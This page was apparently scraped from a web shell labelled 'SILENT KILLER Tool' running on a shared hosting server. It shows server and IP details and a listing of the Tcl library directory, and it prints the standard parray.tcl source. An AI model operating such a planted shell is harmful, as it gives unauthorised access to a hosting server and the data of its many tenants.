Current Path: > > proc > self > root > usr > share > tcl8.6
Operation : Linux premium131.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64 Software : Apache Server IP : 162.0.232.56 | Your IP: 216.73.216.111 Domains : 1034 Domain(s) Permission : [ 0755 ]
Name | Type | Size | Last Modified | Actions |
---|---|---|---|---|
encoding | Directory | - | - | |
http1.0 | Directory | - | - | |
msgs | Directory | - | - | |
opt0.4 | Directory | - | - | |
auto.tcl | File | 21344 bytes | October 12 2019 00:25:28. | |
clock.tcl | File | 128934 bytes | October 12 2019 00:25:28. | |
history.tcl | File | 7900 bytes | October 12 2019 00:25:28. | |
init.tcl | File | 24249 bytes | October 12 2019 00:25:28. | |
package.tcl | File | 22959 bytes | October 12 2019 00:25:28. | |
parray.tcl | File | 816 bytes | October 12 2019 00:25:28. | |
safe.tcl | File | 33439 bytes | October 12 2019 00:25:28. | |
tclDTrace.d | File | 7347 bytes | October 12 2019 00:25:28. | |
tclIndex | File | 5415 bytes | October 12 2019 00:25:28. | |
tm.tcl | File | 11633 bytes | October 12 2019 00:25:28. | |
word.tcl | File | 4860 bytes | October 12 2019 00:25:28. |
# parray: # Print the contents of a global array on stdout. # # Copyright (c) 1991-1993 The Regents of the University of California. # Copyright (c) 1994 Sun Microsystems, Inc. # # See the file "license.terms" for information on usage and redistribution # of this file, and for a DISCLAIMER OF ALL WARRANTIES. # proc parray {a {pattern *}} { upvar 1 $a array if {![array exists array]} { return -code error "\"$a\" isn't an array" } set maxl 0 set names [lsort [array names array $pattern]] foreach name $names { if {[string length $name] > $maxl} { set maxl [string length $name] } } set maxl [expr {$maxl + [string length $a] + 2}] foreach name $names { set nameString [format %s(%s) $a $name] puts stdout [format "%-*s = %s" $maxl $nameString $array($name)] } }
SILENT KILLER Tool